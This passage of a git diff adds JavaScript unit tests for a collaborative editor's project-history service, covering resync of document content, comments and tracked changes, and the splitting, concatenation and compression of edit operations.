this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('computes text updates for docs when hashes differ', async function () {
+        this.fileMap['main.tex'].getHash.returns('first-hash')
+        this.HashManager._getBlobHashFromString.returns('second-hash')
+        this.UpdateCompressor.diffAsShareJsOps.returns([
+          { i: 'test diff', p: 0 },
+        ])
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc],
+            [this.persistedFile]
+          ),
+          docContentSyncUpdate(this.persistedDoc, 'hello'),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            doc: this.persistedDoc.doc,
+            op: [{ i: 'test diff', p: 0 }],
+            meta: {
+              pathname: this.persistedDoc.path,
+              doc_length: this.persistedDocContent.length,
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      describe('for docs whose content is out of sync', function () {
+        beforeEach(async function () {
+          const updates = [
+            resyncProjectStructureUpdate(
+              [this.persistedDoc],
+              [this.persistedFile]
+            ),
+            docContentSyncUpdate(this.persistedDoc, 'the quick brown fox'),
+          ]
+          this.UpdateCompressor.diffAsShareJsOps.returns([
+            { d: ' jumps over the lazy dog', p: 19 },
+          ])
+          this.expandedUpdates =
+            await this.SyncManager.promises.expandSyncUpdates(
+              this.projectId,
+              this.historyId,
+              this.mostRecentChunk,
+              updates,
+              this.extendLock
+            )
+        })
+
+        it('loads content from the history service when needed', function () {
+          expect(this.expandedUpdates).to.deep.equal([
+            {
+              doc: this.persistedDoc.doc,
+              op: [{ d: ' jumps over the lazy dog', p: 19 }],
+              meta: {
+                pathname: this.persistedDoc.path,
+                doc_length: this.persistedDocContent.length,
+                resync: true,
+                ts: TIMESTAMP,
+                origin: { kind: 'history-resync' },
+              },
+            },
+          ])
+          expect(this.extendLock).to.have.been.called
+        })
+      })
+    })
+
+    describe('syncing comments', function () {
+      beforeEach(function () {
+        this.loadedSnapshotDoc
+          .getComments()
+          .add(new Comment('comment1', [new Range(4, 5)]))
+        this.loadedSnapshotDoc
+          .getComments()
+          .add(new Comment('comment2', [new Range(10, 5)], true))
+        this.comments = [
+          makeComment('comment1', 4, 'quick'),
+          makeComment('comment2', 10, 'brown'),
+        ]
+        this.resolvedCommentIds = ['comment2']
+      })
+
+      it('does nothing if comments have not changed', async function () {
+        const updates = [
+          docContentSyncUpdate(
+            this.persistedDoc,
+            this.persistedDocContent,
+            {
+              comments: this.comments,
+            },
+            this.resolvedCommentIds
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+        expect(expandedUpdates).to.deep.equal([])
+      })
+
+      it('adds missing comments', async function () {
+        this.comments.push(makeComment('comment3', 20, 'jumps'))
+        const updates = [
+          docContentSyncUpdate(
+            this.persistedDoc,
+            this.persistedDocContent,
+            {
+              comments: this.comments,
+            },
+            this.resolvedCommentIds
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+        expect(expandedUpdates).to.deep.equal([
+          {
+            doc: this.persistedDoc.doc,
+            op: [
+              {
+                c: 'jumps',
+                p: 20,
+                t: 'comment3',
+                resolved: false,
+              },
+            ],
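+            // 'jumps' starts at offset 20 of
+            // 'the quick brown fox jumps over the lazy dog', hence p: 20.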
meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('deletes extra comments', async function () { + this.comments.splice(0, 1) + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + pathname: this.persistedDoc.path, + deleteComment: 'comment1', + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + }, + }, + ]) + }) + + it('updates comments when ranges differ', async function () { + this.comments[1] = makeComment('comment2', 16, 'fox') + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: 'doc-id', + op: [ + { + c: 'fox', + p: 16, + t: 'comment2', + resolved: true, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('sets the resolved state when it differs', async function () { + this.resolvedCommentIds = ['comment1'] + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.have.deep.members([ + { + pathname: this.persistedDoc.path, + commentId: 'comment1', + resolved: true, + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + }, + }, + { + pathname: this.persistedDoc.path, + commentId: 'comment2', + resolved: false, + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + }, + }, + ]) + }) + + it('treats zero length comments as detached comments', async function () { + this.loadedSnapshotDoc.getComments().add(new Comment('comment1', [])) + this.comments = [ + makeComment('comment1', 16, ''), + makeComment('comment2', 10, 'brown'), + ] + this.resolvedCommentIds = ['comment2'] + + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([]) + }) + + it('adjusts comment positions when the underlying text has changed', async function () { + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + 'quick brown fox', + { + comments: [ + makeComment('comment1', 0, 'quick'), + makeComment('comment2', 12, 'fox'), + ], + }, + this.resolvedCommentIds + ), + ] + this.UpdateCompressor.diffAsShareJsOps.returns([ + { d: 'the ', p: 0 }, + { 
d: ' jumps over the lazy dog', p: 15 }, + ]) + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { d: 'the ', p: 0 }, + { d: ' jumps over the lazy dog', p: 15 }, + ], + meta: { + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + doc: this.persistedDoc.doc, + op: [ + { + c: 'fox', + p: 12, + t: 'comment2', + resolved: true, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: 'quick brown fox'.length, + }, + }, + ]) + }) + }) + + describe('syncing tracked changes', function () { + beforeEach(function () { + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(4, 6), { + type: 'delete', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(10, 6), { + type: 'insert', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(20, 6), { + type: 'delete', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(40, 3), { + type: 'insert', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.changes = [ + makeTrackedChange('td1', { p: 4, d: 'quick ' }), + makeTrackedChange('ti1', { p: 4, hpos: 10, i: 'brown ' }), + makeTrackedChange('td2', { p: 14, hpos: 20, d: 'jumps ' }), + makeTrackedChange('ti2', { p: 28, hpos: 40, i: 'dog' }), + ] + }) + + it('does nothing if tracked changes have not changed', async function () { + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([]) + }) + + it('adds new tracked changes', async function () { + this.changes.splice( + 3, + 0, + makeTrackedChange('td3', { p: 29, hpos: 35, d: 'lazy ' }) + ) + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { + p: 35, + r: 'lazy ', + tracking: { + type: 'delete', + userId: USER_ID, + ts: TIMESTAMP, + }, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('removes extra tracked changes', async function () { + this.changes.splice(0, 1) + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: 
this.persistedDoc.doc, + op: [ + { + p: 4, + r: 'quick ', + tracking: { type: 'none' }, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('handles overlapping ranges', async function () { + this.changes = [ + makeTrackedChange('ti1', { p: 0, i: 'the quic' }), + makeTrackedChange('td1', { p: 8, d: 'k br' }), + makeTrackedChange('ti2', { p: 14, hpos: 23, i: 'ps over' }), + ] + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + // Before: the [quick ][brown ] fox [jumps ]over the lazy dog + // After: [the quic][k br]own fox jum[ps over] the lazy dog + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { + p: 0, + r: 'the quic', + tracking: { type: 'insert', userId: USER_ID, ts: TIMESTAMP }, + }, + { + p: 10, + r: 'br', + tracking: { type: 'delete', userId: USER_ID, ts: TIMESTAMP }, + }, + { + p: 12, + r: 'own ', + tracking: { type: 'none' }, + }, + { + p: 20, + r: 'jum', + tracking: { type: 'none' }, + }, + { + p: 23, + r: 'ps over', + tracking: { type: 'insert', userId: USER_ID, ts: TIMESTAMP }, + }, + { + p: 40, + r: 'dog', + tracking: { type: 'none' }, + }, + ], + meta: { + origin: { kind: 'history-resync' }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('adjusts tracked change positions when the underlying text has changed', async function () { + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + 'every fox jumps over the lazy dog', + { + changes: [ + makeTrackedChange('ti1', { p: 5, i: ' ' }), // the space after every is still a tracked insert + makeTrackedChange('td2', { p: 10, d: 'jumps ' }), + makeTrackedChange('ti2', { p: 24, hpos: 30, i: 'dog' }), + ], + }, + this.resolvedCommentIds + ), + ] + this.UpdateCompressor.diffAsShareJsOps.returns([ + { d: 'the quick brown', p: 0 }, + { i: 'every', p: 0 }, + ]) + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { d: 'the quick brown', p: 0 }, + { i: 'every', p: 0 }, + ], + meta: { + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/UpdateCompressor/UpdateCompressorTests.js b/services/project-history/test/unit/js/UpdateCompressor/UpdateCompressorTests.js new file mode 100644 index 0000000..c8d50b1 --- /dev/null +++ b/services/project-history/test/unit/js/UpdateCompressor/UpdateCompressorTests.js @@ -0,0 +1,1591 @@ +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/UpdateCompressor.js' + +const bigstring = 'a'.repeat(2 * 1024 * 1024) +const mediumstring = 'a'.repeat(1024 * 1024) + +describe('UpdateCompressor', function () { + beforeEach(async function () { + this.UpdateCompressor = await esmock(MODULE_PATH) + this.user_id = 'user-id-1' + 
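+    // The suites below each target one helper. Roughly, multi-op updates are
+    // first split apart (convertToSingleOpUpdates), then regrouped by doc,
+    // pathname and version (concatUpdatesWithSameVersion), and finally
+    // adjacent compatible ops are merged (compressUpdates). A hypothetical
+    // sketch of how a caller might chain them (the real orchestration lives
+    // elsewhere in the service):
+    //
+    //   const singles = UpdateCompressor.convertToSingleOpUpdates(updates)
+    //   const grouped = UpdateCompressor.concatUpdatesWithSameVersion(singles)
+    //   const compact = UpdateCompressor.compressUpdates(grouped)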
this.other_user_id = 'user-id-2' + this.doc_id = 'mock-doc-id' + this.doc_hash = 'doc-hash' + this.ts1 = Date.now() + this.ts2 = Date.now() + 1000 + }) + + describe('convertToSingleOpUpdates', function () { + it('should split grouped updates into individual updates', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'Foo' }), + (this.op2 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: [(this.op3 = { p: 10, i: 'baz' })], + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: this.op3, + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should return no-op updates when the op list is empty', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + ]) + ).to.deep.equal([]) + }) + + it('should not ignore comment ops', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'Foo' }), + (this.op2 = { p: 9, c: 'baz' }), + (this.op3 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + { + op: this.op3, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + ]) + }) + + it('should not ignore retain ops with tracking data', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'Foo' }), + (this.op2 = { + p: 9, + r: 'baz', + tracking: { type: 'none' }, + }), + (this.op3 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + { + op: this.op3, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + ]) + }) + + it('should update doc_length when splitting after an insert', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'foo' }), + (this.op2 = { p: 6, d: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 23 }, + v: 42, + }, + ]) + }) + + it('should update doc_length when splitting after a delete', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, d: 'foo' }), + (this.op2 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 17 }, + 
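+          // 20 - 'foo'.length = 17: the preceding delete shrank the document
+          // before this insert applies.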
v: 42, + }, + ]) + }) + + it('should take tracked changes into account when calculating the doc length', function () { + const meta = { + ts: this.ts1, + user_id: this.user_id, + tc: 'tracked-change-id', + } + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + { p: 6, i: 'orange' }, // doc_length += 6 + { p: 22, d: 'apple' }, // doc_length doesn't change + { p: 12, i: 'melon', u: true }, // doc_length += 5 + { p: 18, i: 'banana', u: true, trackedDeleteRejection: true }, // doc_length doesn't change + { + p: 8, + d: 'pineapple', + trackedChanges: [{ type: 'insert', offset: 0, length: 9 }], + }, // doc_length -= 9 + { p: 11, i: 'fruit salad' }, + ], + meta: { ...meta, doc_length: 20, history_doc_length: 30 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: { p: 6, i: 'orange' }, + meta: { ...meta, doc_length: 30 }, + v: 42, + }, + { + op: { p: 22, d: 'apple' }, + meta: { ...meta, doc_length: 36 }, + v: 42, + }, + { + op: { p: 12, i: 'melon', u: true }, + meta: { ...meta, doc_length: 36 }, + v: 42, + }, + { + op: { p: 18, i: 'banana', u: true, trackedDeleteRejection: true }, + meta: { ...meta, doc_length: 41 }, + v: 42, + }, + { + op: { + p: 8, + d: 'pineapple', + trackedChanges: [{ type: 'insert', offset: 0, length: 9 }], + }, + meta: { ...meta, doc_length: 41 }, + v: 42, + }, + { + op: { p: 11, i: 'fruit salad' }, + meta: { ...meta, doc_length: 32 }, + v: 42, + }, + ]) + }) + + it('should set the doc hash on the last split update only', function () { + const meta = { + ts: this.ts1, + user_id: this.user_id, + } + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + { p: 0, i: 'foo' }, + { p: 6, i: 'bar' }, + ], + meta: { ...meta, doc_hash: 'hash1' }, + v: 42, + }, + { + op: [{ p: 10, i: 'baz' }], + meta: { ...meta, doc_hash: 'hash2' }, + v: 43, + }, + { + op: [ + { p: 0, d: 'foo' }, + { p: 20, i: 'quux' }, + { p: 3, d: 'bar' }, + ], + meta: { ...meta, doc_hash: 'hash3' }, + v: 44, + }, + ]) + ).to.deep.equal([ + { op: { p: 0, i: 'foo' }, meta, v: 42 }, + { op: { p: 6, i: 'bar' }, meta: { ...meta, doc_hash: 'hash1' }, v: 42 }, + { + op: { p: 10, i: 'baz' }, + meta: { ...meta, doc_hash: 'hash2' }, + v: 43, + }, + { op: { p: 0, d: 'foo' }, meta, v: 44 }, + { op: { p: 20, i: 'quux' }, meta, v: 44 }, + { op: { p: 3, d: 'bar' }, meta: { ...meta, doc_hash: 'hash3' }, v: 44 }, + ]) + }) + }) + + describe('concatUpdatesWithSameVersion', function () { + it('should concat updates with the same version, doc and pathname', function () { + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op1 = { p: 0, i: 'Foo' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op2 = { p: 6, i: 'bar' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op3 = { p: 10, i: 'baz' }), + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op1, this.op2], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op3], + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should not concat updates with different doc id', function () { + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op1 = { p: 0, i: 
'Foo' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'other', + pathname: 'main.tex', + op: (this.op2 = { p: 6, i: 'bar' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op3 = { p: 10, i: 'baz' }), + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op1], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'other', + pathname: 'main.tex', + op: [this.op2], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op3], + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should not concat text updates with project structure ops', function () { + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op1 = { p: 0, i: 'Foo' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + new_pathname: 'new.tex', + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op1], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + new_pathname: 'new.tex', + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + ]) + }) + + it("should keep the doc hash only when it's on the last update", function () { + const meta = { ts: this.ts1, user_id: this.user_id } + const baseUpdate = { doc: this.doc_id, pathname: 'main.tex', meta } + const updates = [ + { ...baseUpdate, op: { p: 0, i: 'foo' }, v: 1 }, + { + ...baseUpdate, + op: { p: 10, i: 'bar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 1, + }, + { + ...baseUpdate, + op: { p: 20, i: 'baz' }, + meta: { ...meta, doc_hash: 'hash2' }, + v: 2, + }, + { ...baseUpdate, op: { p: 30, i: 'quux' }, v: 2 }, + ] + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion(updates) + ).to.deep.equal([ + { + ...baseUpdate, + op: [ + { p: 0, i: 'foo' }, + { p: 10, i: 'bar' }, + ], + meta: { ...meta, doc_hash: 'hash1' }, + v: 1, + }, + { + ...baseUpdate, + op: [ + { p: 20, i: 'baz' }, + { p: 30, i: 'quux' }, + ], + v: 2, + }, + ]) + }) + }) + + describe('compress', function () { + describe('insert - insert', function () { + it('should append one insert to the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should insert one insert inside the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 5, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'fobaro' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append separated inserts', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, i: 'bar' }, + 
meta: { ts: this.ts2, user_id: this.user_id },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, i: 'foo' },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 42,
+          },
+          {
+            op: { p: 9, i: 'bar' },
+            meta: { ts: this.ts2, user_id: this.user_id },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should not append inserts that are too big (second op)', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, i: 'foo' },
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 42,
+            },
+            {
+              op: { p: 6, i: bigstring },
+              meta: { ts: this.ts2, user_id: this.user_id },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, i: 'foo' },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 42,
+          },
+          {
+            op: { p: 6, i: bigstring },
+            meta: { ts: this.ts2, user_id: this.user_id },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should not append inserts that are too big (first op)', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, i: bigstring },
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 42,
+            },
+            {
+              op: { p: 3 + bigstring.length, i: 'bar' },
+              meta: { ts: this.ts2, user_id: this.user_id },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, i: bigstring },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 42,
+          },
+          {
+            op: { p: 3 + bigstring.length, i: 'bar' },
+            meta: { ts: this.ts2, user_id: this.user_id },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should not append inserts that are too big (first and second op)', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, i: mediumstring },
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 42,
+            },
+            {
+              op: { p: 3 + mediumstring.length, i: mediumstring },
+              meta: { ts: this.ts2, user_id: this.user_id },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, i: mediumstring },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 42,
+          },
+          {
+            op: { p: 3 + mediumstring.length, i: mediumstring },
+            meta: { ts: this.ts2, user_id: this.user_id },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should not append inserts that are a long time apart', function () {
+        this.ts3 = this.ts1 + 120000 // 2 minutes
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, i: 'foo' },
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 42,
+            },
+            {
+              op: { p: 6, i: 'bar' },
+              meta: { ts: this.ts3, user_id: this.user_id },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, i: 'foo' },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 42,
+          },
+          {
+            op: { p: 6, i: 'bar' },
+            meta: { ts: this.ts3, user_id: this.user_id },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should not append inserts separated by project structure ops', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, i: 'foo' },
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 42,
+            },
+            {
+              pathname: '/old.tex',
+              new_pathname: '/new.tex',
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 43,
+            },
+            {
+              op: { p: 6, i: 'bar' },
+              meta: { ts: this.ts2, user_id: this.user_id },
+              v: 44,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, i: 'foo' },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 42,
+          },
+          {
+            pathname: '/old.tex',
+            new_pathname: '/new.tex',
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 43,
+          },
+          {
+            op: { p: 6, i: 'bar' },
+            meta: { ts: this.ts2, user_id: this.user_id },
+            v: 44,
+          },
+        ])
+      })
+
+      it('should not append ops from different doc ids', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              doc: 'doc-one',
+              op: { p: 3, i: 
